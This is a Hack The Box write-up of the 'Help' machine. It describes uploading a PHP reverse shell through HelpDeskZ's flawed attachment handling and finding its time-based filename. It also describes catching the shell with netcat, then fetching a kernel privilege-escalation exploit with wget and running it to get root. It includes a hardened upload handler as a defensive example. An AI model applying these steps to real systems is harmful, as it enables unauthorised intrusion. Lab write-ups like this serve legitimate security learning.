Help — Hackthebox Writeup

Jake Flint
5 min read, Jun 26, 2019

Help is the first Hackthebox machine that I completed solo. I actually released this writeup when the machine was still active, and was asked to take it down. Oops!
I’m publishing this the way it was when I wrote it 2 months ago, because:

  1. I’m lazy and don’t want to polish it
  2. My writing style and approach/skill level have improved so much in such a short time

nmap -v -sV -A -p- -oN nmap.txt 10.10.10.121

I can see that ports 80 and 3000 are open.

Port 80 displays an Apache2 default page, so I start gobuster.

gobuster -w /usr/share/dirb/wordlists/common.txt -u http://10.10.10.121:80/

While that runs, I check out port 3000.

Using Burp, we can see that the page just uses a GET request. The response headers contain an “ETag” field; maybe we can see if anything is hidden within the string “51-gr8XZ5dnsfHNaB2KgX/Gxm9yVZU”.

https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ETag

gobuster finished though, and has found the /support/ directory. Going there in our browser shows…

There’s a login section that we might try to brute-force, but I don’t like that idea when my only lead is “Shiv”. We can see an empty knowledgebase and news section, but submitting a ticket doesn’t require authentication. It turns out you can attach a file as well, which opens up the possibility of remote file inclusion.
There is also a “lost password” feature, which would be nicer to brute-force (username only) except there’s a captcha. I noted this option down for later, because for now I don’t want to have to learn how to brute-force past a captcha.

We can see that the software is called “HelpDeskZ”, which appears to be open source!
http://www.helpdeskz.com/
https://github.com/evolutionscript/HelpDeskZ-1.0

Back to RFI, now that we know the software is written in PHP we can try uploading a PHP reverse shell.
https://github.com/pentestmonkey/php-reverse-shell

Unfortunately, .php files aren’t allowed. I rename the file to ‘shell.png’ and the ticket appears to submit successfully. If I can find its location I should be able to get a reverse shell. Back to gobuster!

gobuster -w /usr/share/dirb/wordlists/common.txt -u http://10.10.10.121:80/support/

Okay, there’s an uploads folder. That makes sense, but when I try to go to http://10.10.10.121/support/uploads/shell.png

It’s definitely time to look at the source code. In /controllers I can see “submit_ticket_controller.php”.

Lines 137–165 look like they run if there’s a ‘ticket_attachment’. Line 138 tells us the full directory, so now we know that it’s:

http://10.10.10.121/support/uploads/tickets/

Line 140 defines $ext. In our case, it’s “.png”.
Line 141 defines $filename, which is effectively md5("shell.png" . time()) . ".png". That’s hard to read, so breaking it down: take the filename (shell.png), append the output of PHP’s time() function (giving something like shell.png1555481428), MD5 that, and add .png to the end. This gives us a URL like this:

http://10.10.10.121/support/uploads/tickets/b8c1c936c90ac1aeba9571a2fbca6650.png

I wrote a little php script to spit out the filename 3 seconds before/after the current time, and ran it as soon as I could after submitting the ticket. After trying a few times and only getting “Not found” pages, it’s time to look at the source code again.

The filename is definitely correct, and the extension can’t be wrong, so it must be the time() value.

curl -v http://10.10.10.121/support

According to curl, our timezone is off! I change mine to GMT +0.

Trying again, I get:

The image http://10.10.10.121/support/uploads/tickets/2de8a166abf6e7b0eddc0b7982998a99.png cannot be displayed because it contains errors.

Time to check exploitdb. https://www.exploit-db.com/exploits/40300

“The software in the default configuration allows upload for .php-Files ( ?!?! ). I think the developers thought it was no risk, because the filenames get “obfuscated” when they are uploaded. However, there is a weakness in the rename function of the uploaded file”

Looking at line 149, it appears that although the file was already written to disk earlier, the file extension validation has not yet been performed at that point. This means that despite the “File is not allowed” error message we see, the file is sitting in the /tickets folder.
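The two weaknesses described above (the extension check running after the file is already on disk, and a storage name derived from time() that anyone can enumerate) are both server-side fixes. The handler below is an added example written for this writeup, not HelpDeskZ’s own code; the allow-list, the MIME mapping and the upload directory outside the web root are assumptions, and only the ‘ticket_attachment’ field name comes from the page.

```php
<?php
// Added example: hardened ticket-attachment handler (not HelpDeskZ code).
// 1. Validate BEFORE anything is written to a web-reachable path.
// 2. Name the stored file with random bytes, not md5(name . time()).

function store_attachment(array $file, string $uploadDir, array $allowed): ?string
{
    // Reject anything PHP itself flagged (size limit hit, partial upload, no file).
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    // Extension from the ORIGINAL name, lower-cased, checked against a short allow-list.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return null;                      // "File is not allowed", and nothing is on disk
    }
    // Cross-check the content, not just the name: a .png that is really PHP
    // source fails here even though its extension passed.
    $expected = ['png' => 'image/png', 'jpg' => 'image/jpeg',
                 'pdf' => 'application/pdf', 'txt' => 'text/plain'];
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if (($expected[$ext] ?? null) !== $finfo->file($file['tmp_name'])) {
        return null;
    }
    // Unpredictable name: 128 random bits, no time() component to enumerate.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    // move_uploaded_file() refuses paths that did not come from this request's upload.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0640);                   // never executable, not world-readable
    return $name;
}

// Assumed layout: the upload directory sits OUTSIDE the document root, so
// attachments are only ever served back through a download script.
$stored = store_attachment(
    $_FILES['ticket_attachment'] ?? [],
    __DIR__ . '/../private_uploads/tickets',
    ['png', 'jpg', 'pdf', 'txt']
);
echo $stored === null ? "File is not allowed" : "Stored as $stored";
```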

So let’s not get scared off by the “File is not allowed” error this time. The exploitdb PoC is fancier than my script as well, so let’s use that. I change it to “for x in range(-30, 30)” though, because 0,300 seems excessive and I was working with only 3 seconds just fine earlier.

I run “nc -lvnp 8000” with one window, upload “shell.php” this time, and run exploit.py:

We get our shell! The script is nice enough to print the URL for later, so when I ctrl+c out of my shell I can visit the URL again manually.

I find user.txt in ~/home/help/ and submit that hash. Now to root the box.

I like linenum.sh and enum4linux (not sure if they’re the same thing). The machine has “vi”, but after trying to copy these 1000-line scripts into the terminal and having lines get lost, I realise I need to stop being lazy. I spent enough time messing around with this that I also remembered searchsploit.

According to “uname -a”:

Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

No shellcode? That’s fine. I copy /usr/share/exploitdb/exploits/linux/local/44298.c to the folder where I’m working on the box, check it compiles, and run:

python -m SimpleHTTPServer 80

On the box, I navigate to ~/tmp/ and run:

wget http://10.10.13.201/privesc.c

I compile it and run it, and voila!

I find root.txt in the root folder and submit the hash, completing my first hackthebox machine. Yay!
